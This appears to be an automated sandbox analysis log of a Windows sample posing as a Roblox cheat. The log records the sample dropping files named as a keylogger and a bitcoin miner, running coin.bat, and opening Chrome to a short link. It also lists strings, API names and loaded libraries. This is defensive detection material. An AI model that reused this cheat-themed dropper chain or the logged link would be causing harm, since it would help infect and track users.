            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.3.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal90.troj.spyw.evad.winEXE@32/23@18/13
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF75454B6D8 GetLastError,FormatMessageW,LocalFree,3_2_00007FF75454B6D8
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754568624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00007FF754568624
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeFile created: C:\Program Files (x86)\RobloxJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\roblox cheat.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
            Source: C:\Users\user\Desktop\roblox cheat.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: roblox cheat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: roblox cheat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
            Source: C:\Users\user\Desktop\roblox cheat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: roblox cheat.exeReversingLabs: Detection: 60%
            Source: roblox cheat.exeString found in binary or memory: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\include\Installer/Installer.h
            Source: roblox cheat.exeString found in binary or memory: tcontentcontent\avatarcontent\configscontent\fontscontent\skycontent\soundscontent\texturescontent\modelsExtraContentExtraContent\LuaPackagesExtraContent\translationsExtraContent\modelsExtraContent\texturesExtraContent\placesPlatformContentPlatformContent\pcPlatformContent\pc\texturesPlatformContent\pc\terrainPlatformContent\pc\fontsshaderssslWebView2RuntimeInstallerInstallerFailedToLaunchClientInstallerFailedToLaunchItself[FLog::DesktopInstaller] Downloading file {}Failed to download {}Empty response from {}Failed to compare {} to expected hash {} of {}. responseBody size: {}. http code: {}.failed Error from WinInet: {}Failed to overwrite {}[FLog::DesktopInstaller] unzipping file {}[FLog::DesktopInstaller] copying file {}failed to copy file {} to {}C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\Installer\Windows\src\Installer.cppAppPathAppName[FLog::DesktopInstaller] failed to read subkey {}[FLog::DesktopInstaller] found obsolete elevation policy registry of {} in folder {}Uncaught exception occurred. Code: {}[FLog::DesktopInstaller] Uncaught exception occurred[FLog::DesktopInstaller] Failed to recordStatus at milestone {} with error: {}successrecordStatus_{}isBackgroundModeInstallerRestartedFailed with exception {}Caught Windows error: {}Got null installer while initializing{}\Temp\Roblox\{}_{}Failed to create folder {}Failed to copy file from {} to {}failstartNewStatusFile[FLog::DesktopInstaller] Failed to start new status file with error: {}. Removing background mode arg{} {} {}[FLog::DesktopInstaller] Ready to relaunch: {}*"{}\{}\{}"Download startedDownload completed[FLog::DesktopInstaller] Download and install files{}-{}ErrorFile{}Error in running fileTasks{}\AppSettings.xmlfailed to write file: {}{}\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe[FLog::DesktopInstaller] Run webview2 installer {}[FLog::DesktopInstaller] Failed to run webview2 installer {} in user mode: waitResult={}, errCode={}, exitCode={}[FLog::DesktopInstaller] Rerun webview2 installer {} in admin mode[FLog::DesktopInstaller] Failed to run webview2 installer {} in admin mode: waitResult={}, errCode={}, exitCode={}[FLog::DesktopInstaller] No privilege to rerun webview2 installer {} in admin mode[FLog::DesktopInstaller] Create installation folders[FLog::DesktopInstaller] Create installation folder: {}[FLog::DesktopInstaller] Installation Item: {} to {}[FLog::DesktopInstaller] Register environment info{}\{}.exe"{}" -uninstallUninstallStringRoblox CorporationPublisherhttp://{}URLInfoAboutCommentsInstallLocationNoModifyNoRepair{},0DisplayIconDisplayName{:04d}-{:02d}-{:02d}InstallDate{}\CapabilitiesApplicationDescription"{}",0ApplicationIconApplicationName{}\UrlAssociationsbaseHostversionfailed to remove uninstall registryfailed to remove IE subEnviron registryfailed to remove class registryversion-*[FLog::DesktopInstaller] Remove installation target: {}[FLog::DesktopInstaller] Failed to remove old files in {}, you may need delete the folder manually.\Roblox{}\
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Installation-of-desktop-items
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Launching-programs-and-files-in-an-IFRAME
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Launching-applications-and-unsafe-files
            Source: roblox cheat.exeString found in binary or memory: Miscellaneous-Allow-websites-to-open-windows-without-address-or-status-bars
            Source: roblox cheat.exeString found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exeString found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exeString found in binary or memory: Automatically logon with current username and passwordPrompt for user name and passwordAutomatic logon only in the Intranet zoneAnonymous logonDisableHigh SafetyEnablePromptAdministrator approvedNotReachableWifiWiredActiveX-controls-and-plug-ins-Download-signed-ActiveX-controls1001ActiveX-controls-and-plug-ins-Download-unsigned-ActiveX-controls1004ActiveX-controls-and-plug-ins-Run-ActiveX-controls-and-plug-ins1200ActiveX-controls-and-plug-ins-Initialize-and-script-ActiveX-controls-not-marked-as-safe-for-scripting1201Miscellaneous-Allow-scripting-of-Internet-Explorer-Web-browser-control1206ActiveX-controls-and-plug-ins-Allow-previously-unused-ActiveX-controls-to-run-without-prompt1208ActiveX-controls-and-plug-ins-Allow-Scriptlets1209ActiveX-controls-and-plug-ins-ActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrictions120AActiveX-controls-and-plug-ins-Override-Per-Site-domain-based-ActiveX-restrict-ions120BScripting-Active-scripting1400Scripting-Scripting-of-Java-applets1402ActiveX-controls-and-plug-ins-Script-ActiveX-controls-marked-as-safe-for-scripting1405Miscellaneous-Access-data-sources-across-domains1406Scripting-Allow-Programmatic-clipboard-access1407Scripting-Enable-XSS-Filter1409Miscellaneous-Submit-non-encrypted-form-data1601Downloads-Font-download1604Run-Java1605Miscellaneous-Userdata-persistence1606Miscellaneous-Navigate-sub-frames-across-different-domains1607Miscellaneous-Allow-META-REFRESH1608Miscellaneous-Display-mixed-content1609Miscellaneous-Include-local-directory-path-when-uploading-files-to-a-server160AMiscellaneous-Installation-of-desktop-items1800Miscellaneous-Drag-and-drop-or-copy-and-paste-files1802Downloads-File-Download1803Miscellaneous-Launching-programs-and-files-in-an-IFRAME1804Launching-programs-and-files-in-webview1805Miscellaneous-Launching-applications-and-unsafe-files1806Miscellaneous-Use-Pop-up-Blocker1809Allow-OpenSearch-queries-in-Windows-Explorer180EAllow-previewing-and-custom-thumbnails-of-OpenSearch-query-results-in-Windows-Explorer180FUser-Authentication-Logon1A00Allow-persistent-cookies-that-are-stored-on-your-computer1A02Allow-per-session-cookies-not-stored1A03Miscellaneous-Dont-prompt-for-client-certificate-selection-when-no-certificates-or-only-one-certificate-exists1A04Allow-3rd-party-persistent-cookies1A05Allow-3rd-party-session-cookies1A06Miscellaneous-Software-channel-permissions1E05ActiveX-controls-and-plug-ins-Binary-and-script-behaviors2000DotNET-Framework-reliant-components-Run-components-signed-with-Authenticode2001DotNET-Framework-reliant-components-Run-components-not-signed-with-Authenticode2004DotNET-Framework-Reliant-Components-Permissions-for-Components-with-Manifests2007Miscellaneous-Open-files-based-on-content-not-file-extension2100Miscellaneous-Web-sites-in-less-privileged-web-content-zone-can-navigate-into-this-zone2101Miscellaneous-Allow-script-initiated-windows-without-size-or-position-constraints2102Scripting-Allow-status-bar-updates-via-script2103Miscellaneo
            Source: roblox cheat.exeString found in binary or memory: ShowFlashMessage('Worst: ' + (end-start).toFixed(2) + 'ms ' + TimerInfo[Token].name, 100);
            Source: roblox cheat.exeString found in binary or memory: EnabledByDefaultEnabledSetByGroupPolicyDisabledSetByGroupPolicyEnabledSetByDefaultPolicyDisabledSetByDefaultPolicySOFTWARE\Policies\Microsoft\EdgeUpdateWebView2 Runtime Not InstalledInstallWebView2RuntimeTimeoutMsUpdate{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}Install{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}InstallDefault108.0.1462.37C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\WebView2Runtime.cppMicrosoftEdgeWebview2Setup.exe /silent /installFailed to create %sFailed to wait %sFailed to get exit processExitCode %s%s exited with failure processExitCode: %u/silent /installrunasFailed to admin execute %sFailed to admin wait %sFailed to admin get exit processExitCode %sSetDefaultDllDirectoriesC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DLLHelpers.cppfailed to load message resource %uC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\LocalizedText.cppfailed to lock resource %ufailed to find message resource %ufailed to find RCDATA resource %ufailed to get size of resource %uNULL argumentC:\buildAgent\work\ci_deploy_ninja_boot-x86_git\Client\WinUtil\src\DirectXVersion.cppD3D11CreateDeviced3d11.dllFailed to load function D3D11CreateDeviceFailed to create directX device
            Source: roblox cheat.exeString found in binary or memory: iphlpapi.dllif_nametoindexws2_32FreeAddrInfoExWGetAddrInfoExCancelGetAddrInfoExWLoadLibraryExA\/AddDllDirectoryh1h2h3%10s %512s %u %10s %512s %u "%64[^"]" %u %urt%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %d
            Source: roblox cheat.exeString found in binary or memory: set-addPolicy
            Source: roblox cheat.exeString found in binary or memory: id-cmc-addExtensions
            Source: unknownProcess created: C:\Users\user\Desktop\roblox cheat.exe "C:\Users\user\Desktop\roblox cheat.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe"
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe"
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe" Jump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1928,i,13588240422126798521,8416605528282741341,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: uxtheme.dllJump to behavior
